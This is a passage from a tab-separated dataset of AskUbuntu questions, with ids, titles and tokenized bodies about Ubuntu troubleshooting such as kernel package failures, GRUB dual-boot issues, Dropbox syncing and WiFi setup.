1d6b:0104 linux foundation multifunction composite gadget bus 003 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader bus 005 device 003 : id 046d : c016 logitech , inc. optical wheel mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
355916	i have an error after installation of ubuntu 12.04 in display	display is red totally and it shows that out of range.i had installed ubuntu with wubi
355918	dropbox does not sync after suspend	whenever i suspend my ubuntu , and then rewake it , dropbox does not sync , so i do n't see files that i edited on other computers . how can i make it sync ?
355919	skype in outlook.com in ubuntu wo n't work	i would n't normally ask a question like this on askubuntu - it 's more related to web browsers is what some people might say . but , if you read on , you 'll see why i 'm asking it on this forum : if i go to outlook.com in chromium on ubuntu and go to outlook.com then click the messaging icon , the pane shows up . sure enough , at the bottom , it 's connected to messenger and google . but , there is no skype , yet in the people section ( arrow next to outlook - > people ) it says it 's connected to skype . also , if i try doing the same on another laptop ( chrome + xp ) it works fine , as with a school netbook ( ie10 + win 7 ) . i 've tried using a blank temporary profile in chromium just to let you know , so it 's not to do with extensions . to see if it was to do with the browser , i tried using a `` like chrome '' user agent ( instead of chromium/version - > like chrome/version ) - this would make sites think i 'm using chrome , and it worked on whatbrowser.org . but still no luck . any ideas ? and does anyone think i should be asking this on a microsoft forum ?
355922	how to switch off gimp message on rawtherapee export ?	i 'm using rawtherapee 4.0.11.0 and have gimp defined as the external editor . each time export an image from rt into gimp 2.8.6 i get the following message from gimp : '' warning : the image you are loading has 16 bits per channel . gimp can only handle 8 bit , so it will be converted for you . information will be lost because of this conversion . '' any ideas how to turn the warning off ?
355923	running programs not showing in gnome fallback panel	day before yesterday when booted my pc showed a dialogue box telling some applet is missing and it had two buttons 'dont delete ' and 'delete ' , not sure what to do i clicked the close ( x ) button on the top left of the dialogue box . since then running programs are not showing in the bottom taskbar . all other things are working fine . i use ubuntu 12.04 lts . if you need any other info let me know . i use gnome ( 3.4.1 ) installed and i prefer it over the unity interface . the screenshot of the pc which shows the lower taskbar i had and how the running programs were shown in it
355924	how do i install the default unity-lens packages ?	so i did something stupid and got rid of the default unity lenses . how would i restore those ?
355925	not recognizing usb key board	i am trying to load ubuntu server from a disk to an older mac mini . i have a dell key board that connects by usb and it is not being recognized to type in any commands . any advice would be great . thanks in advance .
355926	libreoffice calc : thin borders not printing	in libreoffice calc , by boss has dozens of documents with .05pt borders ; when she prints , some of the borders are n't actually printed , it 's like they 're considered `` too thin '' to show up . it 's not an option to say she needs to re-format all her borders , and apparently this was not an issue with excel . fix ? solution ? hack ? i 'd rather keep her happy on linux than maintain the security black-hole she presents on windows ...
355927	my windows pc is not starting , can i use ubuntu to rescue files ?	if i use the dvd image to try ubuntu and my pc opens , will i be able to find my files on the hard drive and save to a back up external hard drive or will they be locked in to some windows-y place that i ca n't get to .
355929	package operation fail , what can i do please ?	installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 346784 files and directories currently installed . ) preparing to replace ifupdown 0.7.2ubuntu2 ( using ... /ifupdown_0.7.2ubuntu4_i386.deb ) ... unpacking replacement ifupdown ... preparing to replace gpgv 1.4.11-3ubuntu4.2 ( using ... /gpgv_1.4.11-3ubuntu4.3_i386.deb ) ... unpacking replacement gpgv ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up gpgv ( 1.4.11-3ubuntu4.3 ) ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 346784 files and directories currently installed . ) preparing to replace gnupg 1.4.11-3ubuntu4.2 ( using ... /gnupg_1.4.11-3ubuntu4.3_i386.deb ) ... unpacking replacement gnupg ... processing triggers for man-db ... processing triggers for install-info ... setting up gnupg ( 1.4.11-3ubuntu4.3 ) ... setting up linux-image-3.5.0-41-generic ( 3.5.0-41.64 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-41-generic /boot/vmlinuz-3.5.0-41-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-41-generic /boot/vmlinuz-3.5.0-41-generic update-initramfs : generating /boot/initrd.img-3.5.0-41-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-41-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-41-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-41-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.5.0-41-generic : linux-image-extra-3.5.0-41-generic depends on linux-image-3.5.0-41-generic ; however : package linux-image-3.5.0-41-generic is not configured yet . dpkg : error processing linux-image-extra-3.5.0-41-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.5.0-41-generic ; however : package linux-image-3.5.0-41-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.5.0-41-generic ; however : package linux-image-extra-3.5.0-41-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-geno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already neric : linux-generic depends on linux-image-generic ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-image-extra-3.5.0-40-generic ( 3.5.0-40.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.5.0-41-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-40-generic /boot/vmlinuz-3.5.0-40-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-40-generic /boot/vmlinuz-3.5.0-40-generic update-initramfs : generating /boot/initrd.img-3.5.0-40-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-40-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.5.0-40-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.5.0-40-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up ifupdown ( 0.7.2ubuntu4 ) ... errors were encountered while processing : linux-image-3.5.0-41-generic linux-image-extra-3.5.0-41-generic linux-image-generic linux-generic linux-image-extra-3.5.0-40-generic error in function : setting up linux-image-3.5.0-41-generic ( 3.5.0-41.64 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-41-generic /boot/vmlinuz-3.5.0-41-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-41-generic /boot/vmlinuz-3.5.0-41-generic update-initramfs : generating /boot/initrd.img-3.5.0-41-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-41-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-41-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-41-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-extra-3.5.0-40-generic ( 3.5.0-40.62 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.5.0-41-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-40-generic /boot/vmlinuz-3.5.0-40-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-40-generic /boot/vmlinuz-3.5.0-40-generic update-initramfs : generating /boot/initrd.img-3.5.0-40-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-40-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.5.0-40-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.5.0-40-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.5.0-41-generic ; however : package linux-image-3.5.0-41-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-extra-3.5.0-41-generic : linux-image-extra-3.5.0-41-generic depends on linux-image-3.5.0-41-generic ; however : package linux-image-3.5.0-41-generic is not configured yet . dpkg : error processing linux-image-extra-3.5.0-41-generic ( -- configure ) : dependency problems - leaving unconfigured
355937	another preinstalled windows 8 ( sony vaio ) , i have no idea what to do next .	i recently bought a laptop with preinstalled windows 8 . did a clean install via the installation manager at first and got it to work . then there was an issue when i tried the ati proprietary drivers that i was unable to resolve so i made a clean install again . how ever this time it wo n't work and i get the `` no operating system found '' on boot . what can possibly have changed since the first time ?
355938	excessive resource use in syncing home folders with dropbox	my situation is that i work close to equally from home and from my workplace 's office , and i 'm attempting to set up two ubuntu virtual machines that stay mostly synced with each other . i 'm primarily concerned with syncing preferences and files , as i wo n't change software packages enough to justify attempting to sync that to . my solution was to set up dropbox on both vms , and create file links from my user home folder into the dropbox folder . the dropbox folder exists in a different directory , with appropriate file permissions , that 's not contained by my user 's home folder . my vms are also the same ubuntu version ( 12.04 64 bit ) . as far as i can tell the syncing part works correctly . my problem is that dropbox seems to be caught in some kind of recursive situation where it 's constantly attempting to sync files that are constantly changing between the two machines . this is most obvious in the data use , as after having had dropbox installed and the vm running for about four days , i started the vm this morning and it 's already used 1.5gb of bandwidth to sync a home folder that 's only 440mb or so . dropbox also runs 60 % or more cpu use constantly . my question that you guys can answer is what ubuntu related files and folders should i add to the dropbox ignore list so it 's not constantly syncing files that change regularly , but are irrelevant to my needs ? is there an error/message log someplace that i should ignore or anything like that ?
355939	wifi connetion does not start at boot at ubuntu 13.04 server	i have an ubuntu 13.04 server and want to connect to my network via wifi . at boot i get `` waiting for network configuration ... '' and `` waiting up to 60 more seconds for network configuration ... '' . however my wifi led is not turned on and get no connection . when i run sudo service networking restart the wifi led is turned on and i connect quickly . this is my /etc/network/interfaces : auto lo iface lo inet loopback # the primary network interface auto wlan0 iface wlan0 inet dhcp wpa-ssid myssid wpa-psk mypassword do you have any idea how to connect immediately at boot ? edit : my dmesg output
355941	will any dvd drive work with ubuntu ?	i have scourged websites for samsung / lite-on/ lg / asus and none list `` linux '' in their os supported sections . is there a special brand / model of dvd drive for ubuntu / linux ? thank you .
355943	how is ip getting autobanned by ubuntu ?	i have an ubuntu server running postfix/dovecot and shorewall firewall . every so often i see in the logs that external ip address are getting banned but i can not figure out where or how this is happening . it seems to be if server sees too many connections coming from the ip it bans it . would anyone have any idea ? sample logs hostname skds : more than 3 different users from 10.10.10.10 , banning hostname skds : ban timeout for 10.10.10.10 , unbanning hostname skds : more than 3 different users from 10.10.10.10 , banning hostname skds : ban timeout for 10.10.10.10 , unbanning ( ip redacted ) google returns nothing for logs samples .
355947	what are the packages list in ubuntu ?	i 've seen several times people talking about apt-get and packages list , i know what is apt-get and what it does , but what are the packages lists ?
355952	how can i install more partitions , i have two i think swap and primary i guess ?	my friend was on skype explaining to me how to install linux so we didnt take whole hard disk space for linux he said that later i can always edit that and add partitions , i dont even now how to check how much space swap area is to me , i read here it says it should be 4gb i think that we set more , i am new to linux , so i am asking for help here , my hard disk is 640 bytes and later i think in few months i will surely install windows 7 because linux looks to complicated to me , but i want to try to take whole hard disk space for linux to use gim for few months maybe i will learn how to use it and everything will be ok.thanks a lot guys
355956	hp probook over heating	my hp probook 4530 's fan doesnt seem to be turning up when it needs to . im currently running the latest version of ubuntu aka 13.04 . i dont play games much and my hp probook only has intel 3000 graphics . all the drivers seem to be in order . however my fan is not turning up when needed . i am new to linux as well . now i have to install a fan speed control application . if someone could help me out that would be great . i even attempted modifying the grub file . i added the line grub_cmdline_linux_default= '' quiet splash pcie_aspm=force i915.i915_enable_rc6=1 i915.lvds_downclock=1 '' to no avail . i must switch computers now because my laptop is getting to hot . help would be greatly appreciated .
355957	macbook air 4,1 camera and skype	i have a macbook air 4,1 running raring 13.04 i am trying to use skype to video chat , but when i do , the video seems to cut out after short amounts of time . it seems like the camera has just been disabled or decided to sleep . if i keep the settings open and continuously disable/re-enable the camera i can revive it for a short period . sometimes turning video off then on again within the skype conversation will get it to work again for a short while . i had read somewhere that because skype is a 32 bit program and it is running on a 64-bit operating system that sometimes the proper 32-bit libraries do n't get loaded , or something along those lines . i 'm sorry but i ca n't remember the exact details . anyway , i created an executable that reads : # ! /bin/bash ld_preload /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so skype but this does not seem to help . i am unsure of exactly what this does , but i figured i would include it as something i have tried . does anyone have any suggestions ?
355959	killing tor causes all the present and future windows to loose the frames	almost , every time if sudo pkill -f tor which runs as root on startup . i loose all the frames ( frameless ) of my current and future windows . and i have noticed the ubuntu tends to behave strangely ( ca n't define it exactly ) to such an extent that restart ( did n't try log-off and log-in ) seems to be a be better option for me . i do n't think tor is the cause of this but i am speaking as per observation . what could be the reason behind this ?
355962	ubuntu 12.10 lts wont show my connected audio outputs	when i plug my headphones in i will hear and see nothing from that output . nothing happens when i plug my output in , it will stay the same . help is really appriciated since i need my sound back as soon as possable [ edit ] heres my alsamixer setting , since so many people are asking for it , and i can not post pictures since my reputation is to low card : hda nvidia f1 : help │ │ chip : realtek alc662 rev1 f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : master [ db gain : 0,00 ] esc : exit │ 100 100 < > 100 100 < > 100 0 < > 0 100 < > 100 100 < > 100 100 100 < master > pcm front front mi front mi surround center lfe 0 < > 0 0 < > 0 0 < > 0 line s/pdif s/pdif d channel rear mic < rear mic >
355965	finding what 's running on screen session	i have this screen process which has open my serial port : $ sudo lsof | grep /dev/ttys0 screen 23520 root 6u chr 4,64 0t0 1421 /dev/ttys0 $ cd /proc/23520 $ head -n 5 status name : screen state : s ( sleeping ) tgid : 23520 pid : 23520 $ screen -ls there is a screen on : 21200.pts-1.porkypig ( 07/10/2013 12:25:42 pm ) ( detached ) $ screen -r 21200.pts-1.porkypig when i reattached to the screen session , to see exactly what it 's doing . i see this long log of information . it seems like the result of `` tail -f '' , that is , a continous log being output . /proc/23520 $ cd cwd pwd /proc/23520/cwd ls -l -rw-r -- r -- 1 root root 2147 2013-10-07 17:55 minicom.log when i switch into the directory ( cwd ) that this process was run from , i notice minicom.log , which makes me suspect the user ran something like `` tail -f minicom.log '' . i know that in linux we can use history to track back commands that were run . but how can i confirm the command was run to display what i am currently looking at in my screen session ?
355968	how does selecting `` use lvm '' in the ubuntu installer work ?	i 'm installing ( l ) ubuntu using ubiquity from a liveusb , and i want to use lvm , since i 've read that it can organize my three hard drives to work as a single unit . if i check the box `` use lvm with the new ubuntu installation '' , does this utilize all my hard drives , or do i have to do manual partitioning/configuration ? i 've searched around , and found some potentially helpful sites , but i ca n't find anywhere that discuss how ubiquity uses lvm . most other sites are quite old ( > 1yr ) , and so they all mention that manual setup of lvm is the only method since ubiquity does n't utilize lvm yet .
355969	smart scope server side application ?	as smartscopes start to become reality and are quite central parts in the ubuntu unity experience it would be interesting to know a bit more about the heart ( or maybe brain ? ? ) of this feature . what i mainly wonder is : is the server side application that handles all the requests from the scopes open source ? i have been googleing but have n't found anything useful ... does anyone have any further , more detailed information ? thanks !
355970	why is software updater showing additional updates ?	i have never seen this before until today . just a moment ago software updater displayed itself to me and said i have packages i need to update . among them was clamav , which i have never installed . i did not click the update button and instead went to my command line and typed sudo apt-get update & & sudo apt-get upgrade and it showed less packages needing to be updated than in the software updater gui . why is there a difference between what apt-get and what software updater think need to be updated ? why did my computer install clamav ? i did a thorough check before continuing with the software updater , and noticed that i do n't have any form of clamav installed on my computer . why is software updater telling me i should update clamav if it is n't even installed to begin with ? do newer versions of ubuntu now include clamav as part of the base installation ? i 'm not against running clamav on my system , although i 'm certain i have no need for anti-virus on my linux machines , since they are secure through obscurity . what i am concerned about , though , is why the ubuntu software updater is showing more updates than apt-get and why it is showing updates for software i do not have installed .
355976	i ca n't boot after ubuntu installation	i have just installed ubuntu 13.04 , yet i had problems getting into any of the systems after installation [ i had windows 7 installed before ] . the problem is , that after installation and restart , i did n't get the option to boot ubuntu , only previous windows vista [ which i replaced with ubuntu ] and windows 7 . i was trying to repair the boot option via windows 's easybsd or whatever was it called , then after restart , i had two options - windows vista and ubuntu . neither worked - vista has been deleted and replaced by ubuntu and 'ubuntu ' option was somehow wrongly set . now , i have two systems installed and i can not run neither of them , so i 'm using livecd . is here anybody who 'd tell me exactly what am i ought to do ? i 'm literally lost ... thanks . edit : sudo fdisk -l output : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x7c12e647 device boot start end blocks id system /dev/sda1 * 63 1729975589 864987763+ 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 1935093760 1953521663 9213952 7 hpfs/ntfs/exfat /dev/sda3 1912696830 1929230335 8266753 5 extended partition 3 does not start on physical sector boundary . /dev/sda4 1729976320 1912694783 91359232 83 linux /dev/sda5 1912696832 1929230335 8266752 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 7862 mb , 7862353920 bytes 37 heads , 37 sectors/track , 11217 cylinders , total 15356160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 15356159 7674048 c w95 fat32 ( lba ) disk /dev/sdc : 8053 mb , 8053063680 bytes 255 heads , 63 sectors/track , 979 cylinders , total 15728640 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 2048 15728639 7863296 b w95 fat32
355980	screencloud tray icon not showing with cinnamon	i already had this problem back on unity , but it was fixed thanks to a fellow asker . i just installed cinnamon and it does good job for me - but there 's not screencloud icon in system tray . i need it to switch to hdd dumping of screenshots when screencloud servers are down for maintenance . i use it for work so it 's really a problem . thanks in advance !
355981	why 's my hp laptop 's hdmi turning off when i close my laptop lid ?	hp pavilion g6 ubuntu 12.10 i 've disabled the screen-saver , suspend etc from gconf-editor and /etc/ ... / sys files only to fail in my quest each time with no particular success . this might 've been a hardware problem but then again , windows did n't had this problem at all , giving me hope ... somewhere ... buried deep in those sys files ! there is no suspend or sleep involved , all that happens is a screen-off more like a power cut-off to the hdmi port and laptop screen together .
355983	bash , what is command , utility , builtin , how do i distinguish	i 'm running bash scripting , but sometimes i get confused which of these commands i use belong to who . sometimes 'man xxx ' works , sometimes does n't , so i use ' -- help ' or 'info ' , mostly one of these works to show description of the command . can anyone tell me how i would know what command belongs to what ? bash builtin , gnu utility , etc .
355984	which version is compatible with my 8 year old dell ?	my computer has - 1gb of ram â intel ( r ) pentium ( r ) d 2.80ghz . should i install ubuntu 12.04 lts 32bit or 64bit or ubuntu 13.04 32bit or 64bit ? i know ubuntu has a word processor , but am i correct in assuming that i can install ms office 2007 on ubuntu ?
355986	not able to execute .sh file	i downloaded modelsim install file which contained .sh file in it -setup.sh i did the following two things right click- > properties- > permision- > allow executing file as program - > double clicked the setup.sh - > run . nothing happened . no error ... nothing . in terminal cd /to the path of the setup.sh chmod -x setup.sh ... nothing happened no error nothing . the cursor passd on to the next line ./setup.sh ... nothing happened . i also tired sh setup.sh and bash setup.sh , still nothing happened . downloaded the whole file again still nothing happened contents of the setup.sh file are : # ! /bin/sh export script_path=`dirname `` $ 0 '' ` export cmd_name= '' $ script_path/components/quartussetupweb-13.0.1.232.run '' eval exec `` \ '' $ cmd_name\ '' '' $ @
355987	spotify for ubuntu	i 'd like to use spotify with ubuntu . i 've had a look at the previous questions and answers and do n't understand the language - sorry . is it possible to have step by step instructions ? i use linux not through any desire to be a programer but more a sense of 'rebel forces against the evil empire ' : - )
355992	update-grub does not detect windows although os-prober does	i installed ubuntu 12.04 on my laptop , then windows 7 , and then fixed grub with gparted livecd . now i am in ubuntu , and when i type sudo update-grub , i do n't see windows detected , i see that instead : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-031100-generic found initrd image : /boot/initrd.img-3.11.0-031100-generic found linux image : /boot/vmlinuz-3.2.0-54-generic found initrd image : /boot/initrd.img-3.2.0-54-generic found linux image : /boot/vmlinuz-3.2.0-52-generic found initrd image : /boot/initrd.img-3.2.0-52-generic found linux image : /boot/vmlinuz-3.0.0-14-generic found initrd image : /boot/initrd.img-3.0.0-14-generic found memtest86+ image : /boot/memtest86+.bin done when i do sudo os-prober though , i see that : /dev/sda4 : windows 7 ( loader ) : windows : chain why i ca n't add windows to my grub using sudo update-grub , and how can i add it to grub so that i select os during booting time ? for there reference , here 's output from bootinfoscript : http : //paste.ubuntu.com/6215476/ bonus question : here 's the output of sudo fdisk-l. why windows partition is marked as boot partition , although ubuntu is the one which is booted up after all ? disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x3d7c8272 device boot start end blocks id system /dev/sda1 16072 626807 305368 de dell utility /dev/sda2 626808 6927031 3150112 c w95 fat32 ( lba ) /dev/sda3 6928384 1237176319 615123968 83 linux /dev/sda4 * 1237176320 1953523711 358173696 7 hpfs/ntfs/exfat
355993	application placement is messed up when switching to display with higher resolution	i use a laptop as my main computer . but when working i `` dock '' it by connecting an external screen and usb hub . the problem is that the placement of all my application windows on my virtual desktops gets messed up when docking the computer . it seems like the window placement is calculated from pixels instead of relative to the desktop edge . when i 've worked on my external monitor and go back to working on the laptop all windows are where i expect them to be . is there a clever fix , is there a different behavior in later versions of ubuntu , or should i file a bug report on this ? : )
355994	grub does not show ubuntu 12.04 lts in the menu after fresh installation	i 've installed a fresh copy of ubuntu 12.04 lts in my dell xps laptop ( single 500gb drive ) along with windows 7 . i 've installed from usb pendrive and i created the ubuntu usb using universal usb installer 1.9.4.3 . after creation , i tried to boot using pendrive ; but , it showed that it did n't find boot loader `` /casper/vmlinuz.efi '' . but in image cd ( ubuntu-12.04-desktop-amd64.iso ) it is named as vmlinuz without efi extension . so , i renamed the file and added the extension . after that it booted fine . during installation , i selected the manual partition option to create partition for / , /home and swap . and i selected the /sda as boot loader installation location . it installed without any problem and after installation , it prompt me to restart . after restart , when the grub boot menu appears , it only shows two memtest entries and windows 7 loader entry . there is no entry for newly installed ubuntu 12.04 . i 've installed second time and the same thing have happened . previous year , i installed it successfully without any hassle and every linux installation i did had not this kind of problem . i 've multiple times installed it in vmware and virtualbox . can someone tell me how to fix this ? i would appreciate to know the reason for this problem so that it can be avoided in the future .
355997	installing ubuntu on windows 8 ubuntu does n't load	i installed ubuntu 12.4 on computer with previously installed windows 8 . when i reboot the system i have two options to choose from when i select ubuntu it give me a black page that says that windows is damaged and i have to repair it . it says that there are missing files in ubuntu directory.did i downloaded the correct ubuntu ? i selected for the option other when asked what kind of operational system i am running - there was no option window8 .
355998	cat command error message	i am new to linux and am trying to get to know the command line and i got to the cat command and am having trouble with an error message . i am not quite sure what is happening here . every time i type cat to open a file i get cat : abod : no such file or directory . i am trying to open a file from libreoffice using `` cat blog.odt '' any body knows what i am doing wrong ?
356000	black screen after installing ubuntu touch . galaxy nexus ( maguro )	i just flashed the ubuntu touch files on my gsm galaxy nexus ( maguro ) , but when booting after the google logo it just shows a black screen . i 've waited for 15 minutes for it to boot , but it did n't . i did a factory reset before installing , and have also tried going back to android and trying again . my recovery is twrp 2.6.0.0
356004	ubuntu wo n't let me enter my root password	when i was installing a program , it said that i needed to run it as a normal account rather than an administrator account , and so , being the inexperienced person that i am , changed my account to standard rather than administrator . when i went to change it back , i clicked unlock , and entered my password ( the only password i have ever used for this computer ) , and it said that my authentication attempt was unsuccessful . i 've tried changing my password in the recovery mode before booting , and it still does n't work . i ca n't install any programs without being admin .
356005	help on installing a tar.gz on ubuntu	okay , i am trying to install , icecast http : //www.icecast.org/ guggy @ guggy-pc : ~/downloads/icecast $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... 64 checking for ansi c header files ... ( cached ) yes checking whether time.h and sys/time.h may both be included ... yes checking alloca.h usability ... yes checking alloca.h presence ... yes checking for alloca.h ... yes checking sys/timeb.h usability ... yes checking sys/timeb.h presence ... yes checking for sys/timeb.h ... yes checking for pwd.h ... yes checking for unistd.h ... ( cached ) yes checking for grp.h ... yes checking for sys/types.h ... ( cached ) yes checking for setuid ... yes checking for chroot ... yes checking for chown ... yes checking for __func__ ... yes checking for localtime_r ... yes checking for poll ... yes 